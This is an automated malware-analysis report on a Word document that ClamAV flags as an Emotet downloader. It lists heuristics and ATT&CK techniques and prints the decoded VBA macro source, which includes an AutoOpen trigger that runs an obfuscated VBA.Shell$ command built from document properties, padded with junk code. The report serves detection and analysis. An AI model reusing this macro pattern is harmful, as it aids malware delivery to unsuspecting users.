MALICIOUS
210
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-6344335-3', indicating it's a downloader for the Emotet family. Heuristics confirm the presence of VBA macros, including an AutoOpen macro, and a critical finding of a Shell() call within the VBA code. This strongly suggests the macro is designed to execute external commands, likely PowerShell, to fetch and run a subsequent stage.
Heuristics 7
-
ClamAV: Doc.Downloader.Emotet-6344335-3 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6344335-3
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
On Error Resume Next VBA.Shell$ "" + zUZyTfUm + AuSvunDexZP + CDpkkYMhdC + WmXpHYzTpBR + cSZLAfBZUm + MdEDYaYH + vhhUHEb + GVPACBpFB + dTdPmuSZZc + tcvAEdvvg + UWWrdtVH + EGvBAYCBKZ + ubGhMvhc + yVPhxETAa + ActiveDocument.CustomDocumentProperties("VkrLdXBax") + zUZyTfUm + AuSvunDexZP + CDpkkYMhdC + WmXpHYzTpBR + cSZLAfBZUm + MdEDYaYH + vhhUHEb + GVPACBpFB + dTdPmuSZZc + tcvAEdvvg + UWWrdtVH + EGvBAYCBKZ + ubGhMvhc + yVPhxETAa + ActiveDocument.BuiltInDocumentProperties("Comments") + zUZyTfUm + AuSvunDexZP + CDpkkYMhd … End Function -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub autoopen() NGHbyag -
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5964 bytes |
SHA-256: acd837ed7e81ddfdcc5a6b2e95bfb080eadc591103c640ac286b3e7450fbd5c4 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Sub qCDDB9184()
On Error Resume Next
Set XVKY = 71
For RNvaX = wgULl To YKD
For tZT = tnwq To zTln
TKh = 244467177 + sbeBwf374 / 6397 / OVLUAO9b + 259 - TfFZKI
Next
Do While XDfTj Xor 14
ylecvr2 = (2 + Sgn(261 / Sgn(3 / ChrB(DUfAlxm - CInt(298) / YhJQf4KyR + Log(5273))) + GNxhG6k + 9) + OLzl20D - Sin(OqUd / Fix(7415 / ChrW(edF)) / zsnNT6AZ / 96) * (7799 / 969 + 1 / Int(9076 / Sqr(5) / QRtp / 23) / lQV - CInt(8)))
Loop
While lQYmiz1 < QNKQ
Mdlz52jx = (tEVv0 * Chr(2) - (bTjuEw1 / Atn(2)))
Wend
Next
End Sub
Sub AiLU32h()
On Error Resume Next
oaJMGg581 = dYgrc
Select Case klICSkr7
Case 4
MCNXD4 = ChrB(OMlC70C9 - Int(3))
Zmr = zjfr5R5K
Case 243
AwH = Rnd(sxeo)
mmHsO = CLng(Apelu9s)
Case 61
Zsdi8O = CBool(Ass * Chr(jrjjxBP3 * Hex(19986611 * Cos(4936) - AfLFs560o * Log(mgs + JpMO - 8 + Sqr(8)))))
XkKL = 259
End Select
End Sub
Sub nxwTj3(ESLc0T84)
On Error Resume Next
Nrab34d = 463216041 + ekOv8j2za
afN = 523743394 - zElx148l
End Sub
Sub Dwlyv(EamD92P41)
On Error Resume Next
For KPOI8915z = 4 To rrpo
Set wUCUgSZIx = 356
Iyhrn9 = gKe
vqaiI = 38751294 + PfAK0u
For dPimZ = 86 To 904
bOnq5R225 = xPcfHkR7q - Sin(271 - 296984522 / Vcpe37 / Rnd(EZLseK9)) * 169598484 / ChrW(7 + CBool(4257) * EGTC - CLng(343 - Rnd(ZoJhB8))) - (yJkC229 / CDbl(2 + wyCTz7rOj * 21 * CLng(142)) + (CEoAE6 + CSng(222694130)))
Next
Next
Set lBUL = gbm
End Sub
Sub autoopen()
NGHbyag
End Sub
Sub mCT(OCeOf3l)
On Error Resume Next
Select Case RaEi
Case 510
eGNl6 = LQGF
XYpWc = sFsnd
fxaWQM7AA = Int(XegBLS7)
Case 431
sat = 6529
duNy0F7f4 = LCRMPx
KEjU = 4
End Select
yeeCYFw7 = (7561 - CDbl(BIJs842) - 48014896 - Cos(dZMehTl) + ZrEwT * Int(NtpcagMz1) - (nfEl * Oct(FqFic405) - (92 + CBool(6724))))
Do While vSurk Eqv 19
Set byr = QJnaqWe6
FGQZ9qd = eOGQh
Set PCok590W = 14
aETDK = 503042951 * YQZNP6J
ZvJh7v2 = jdfKh9 * 291363821
Loop
End Sub
Sub ZREod6n8i()
On Error Resume Next
vhT = gega5J9f5
If fPFI = 19 Then
If AostN0 = HSZ Then
WkcS = 30135853
End If
For KeQs92 = 1 To jldx1AElW
UPR = (FcGH5 / Rnd(23) + (hyRh * Round(KOvO022 + CStr(396))))
Next
End If
Select Case QhUTa
Case 477215746
LjI = lqcHLIbmQ
Oht = CInt(996)
zmMR6805 = CLng(37)
Case 3235
igN = 32
fHQwsYb4 = Log(LDko6)
HGzq = Sqr(saLG - ChrB(vGnK) / RDlILR0w * Fix(89))
End Select
End Sub
Sub jxMf1hm6()
On Error Resume Next
If nXQO2K = 13 Then
nHkY471xN = (8 + CDate(70) * 425465999 - CBool(Jnj * Int(6641) / XtC / Sqr(106))) + 2759 + Int(143389103) + 3 / CDate(GVKO + 6265 + wCa / Sqr(XWuwl9P8X))
If xkFM98i1k <= Kbqs921 Then
ghODfekr = Hex(34)
End If
End If
YgyQ4 = 52344311 - 167383227
End Sub
Sub PUQq5P()
On Error Resume Next
wWCD = NPxd886M + tXNn
Set OTcQ9a35 = gWzqGC0
qBvs2N = (9636 - Sin(xhGx * CSng(sAH)) + (461691645 * CDate(943) / 2180 / CDate(FXZWn4)))
End Sub
Public Function NGHbyag()
On Error Resume Next
VBA.Shell$ "" + zUZyTfUm + AuSvunDexZP + CDpkkYMhdC + WmXpHYzTpBR + cSZLAfBZUm + MdEDYaYH + vhhUHEb + GVPACBpFB + dTdPmuSZZc + tcvAEdvvg + UWWrdtVH + EGvBAYCBKZ + ubGhMvhc + yVPhxETAa + ActiveDocument.CustomDocumentProperties("VkrLdXBax") + zUZyTfUm + AuSvunDexZP + CDpkkYMhdC + WmXpHYzTpBR + cSZLAfBZUm + MdEDYaYH + vhhUHEb + GVPACBpFB + dTdPmuSZZc + tcvAEdvvg + UWWrdtVH + EGvBAYCBKZ + ubGhMvhc + yVPhxETAa + ActiveDocument.BuiltInDocumentProperties("Comments") + zUZyTfUm + AuSvunDexZP + CDpkkYMhdC + WmXpHYzTpBR + cSZLAfBZUm + MdEDYaYH + vhhUHEb + GVPACBpFB + dTdPmuSZZc + tcvAEdvvg + UWWrdtVH + EGvBAYCBKZ + ubGhMvhc + yVPhxETAa + SUSkDAarU, 0
End Function
Sub CJBO(KROLq)
On Error Resume Next
Set WGB = icLi32Yg8
Set zSa = 9093
End Sub
Sub PYm(wicz7B)
On Error Resume Next
While nfAoQS8 And 3845
While ILXjd = UaGdD
DkhKoJ0Q = CStr(CZlI21 / Sgn(rtCU) - 5 - Log(4004))
Wend
Do
HgE = 920 - Sqr(bwTb) * Osid0 * ChrW(VGGmw8528) * zRiB0 - CDate(yPKBi988) - OfDG7z4 / 75 / (3911 * 61)
Loop Until tvrd0 > XIyg2r
Do
qOQiQ = 37
Loop Until wEHjnC4G Eqv 13
PeKO7700 = 6
Wend
CbLC802nM = 58
End Sub
Sub coyLL4483()
On Error Resume Next
HKOf8 = CNzW2
Nxcrx03 = 931 + CSng(EZwR79) + xacir + Sgn(7) / 313142270 - FuLA470
While kHV > nVdw2jg80
Dim XWlD60BI(6750)
Do
cYOL4m = GVbN4kk / CDbl(1) * 54 * Log(Ghxaj5c) * 59 + Hex(277548149) / (338756838 * CLng(pOLB7b) * 74 / CDbl(AAyv))
Loop Until zOA < guKY35AP
For Each APAUYL In gnxyf3p7
TAp = 31
Next
tfOdIucY3 = PwLz + hJlPS9e
OeZs8 = WvhKP2 - qcXKn1T
Wend
End Sub
Sub odJJadX4()
On Error Resume Next
While aCbM0 Or 263350428
Do
bIw = (PcxS + Sin(41) - zyaTP4Y2 / Cos(FZJGT2H4O - Log(19) * BrOIwQ + zOSd) + 25 / CByte(tfoS5) * 238281049 + ChrW(355980611)) + (3 * 330721017 - ueUljiQ - 9)
Loop Until sXyiz >= tfJ
Do
oqYn1Z7 = (9948 * CByte(35 * CBool(bphOp0pM)))
Loop Until wKf >= 15
Wend
oJv = JZAT7welP + Fix(neq - 25 - 18 / Tan(RuWy0v)) + 5955 + CByte(zFXl) - ihXR0 * Int(nqFK9wp3 * Hex(fPzM80B) - 9834 / Chr(qWPbsT0P7))
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.